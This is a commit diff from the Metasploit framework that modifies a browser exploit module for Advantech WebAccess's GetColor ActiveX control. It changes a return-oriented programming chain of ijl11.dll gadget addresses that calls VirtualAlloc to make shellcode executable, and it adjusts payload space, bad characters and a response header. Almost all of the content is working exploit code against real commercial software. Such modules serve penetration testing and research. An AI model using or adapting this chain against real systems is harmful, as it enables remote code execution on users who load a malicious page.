Skip to content

Commit 5c6236e

Browse files
jvazquez-r7jvazquez-r7
committed
Fix rop chain to allow VirtualAlloc when end of stack is too close
1 parent 64ac1e6 commit 5c6236e

File tree

1 file changed

+16
-5
lines changed

1 file changed

+16
-5
lines changed

modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb

Lines changed: 16 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -48,7 +48,7 @@ def initialize(info = {})
4848
},
4949
'Payload' =>
5050
{
51-
'Space' => 4096,
51+
'Space' => 1024,
5252
'DisableNops' => true,
5353
'BadChars' => "\x00\x0a\x0d\x5c",
5454
# Patch the stack to execute the decoder...
@@ -83,22 +83,22 @@ def on_request_exploit(cli, request, target_info)
8383
EOS
8484

8585
print_status("Sending #{self.name}")
86-
send_response_html(cli, content)
86+
send_response_html(cli, content, {'Pragma' => 'no-cache'})
8787
end
8888

8989
# Uses gadgets from ijl11.dll 1.1.2.16
9090
def rop_payload(code)
9191
xpl = rand_text_alphanumeric(61) # offset
9292
xpl << [0x60014185].pack("V") # RET
9393
xpl << rand_text_alphanumeric(8)
94-
# EDX = flAllocationType (0x1000)
94+
95+
# EBX = dwSize (0x40)
9596
xpl << [0x60012288].pack("V") # POP ECX # RETN
9697
xpl << [0xffffffff].pack("V") # ecx value
9798
xpl << [0x6002157e].pack("V") # POP EAX # RETN
98-
xpl << [0x9ffdbf89].pack("V") # eax value
99+
xpl << [0x9ffdafc9].pack("V") # eax value
99100
xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
100101
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
101-
# EBX = dwSize (0x1000)
102102
xpl << [0x60018084].pack("V") # POP EBP # RETN
103103
xpl << rand_text_alphanumeric(4) # padding
104104
xpl << rand_text_alphanumeric(4) # padding
@@ -108,8 +108,19 @@ def rop_payload(code)
108108
xpl << [0x60012288].pack("V") # POP ECX # RETN
109109
xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
110110
xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
111+
# EDX = flAllocationType (0x1000)
112+
xpl << [0x60012288].pack("V") # POP ECX # RETN
113+
xpl << [0xffffffff].pack("V") # ecx value
114+
xpl << [0x6002157e].pack("V") # POP EAX # RETN
115+
xpl << [0x9ffdbf89].pack("V") # eax value
116+
xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
117+
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
111118
# ECX = flProtect (0x40)
112119
xpl << [0x6002157e].pack("V") # POP EAX # RETN
120+
xpl << rand_text_alphanumeric(4) # padding
121+
xpl << rand_text_alphanumeric(4) # padding
122+
xpl << rand_text_alphanumeric(4) # padding
123+
xpl << rand_text_alphanumeric(4) # padding
113124
xpl << [0x60029f6c].pack("V") # .data ijl11.dll
114125
xpl << [0x60012288].pack("V") # POP ECX # RETN
115126
xpl << [0xffffffff].pack("V") # ecx value

0 commit comments

Comments
 (0)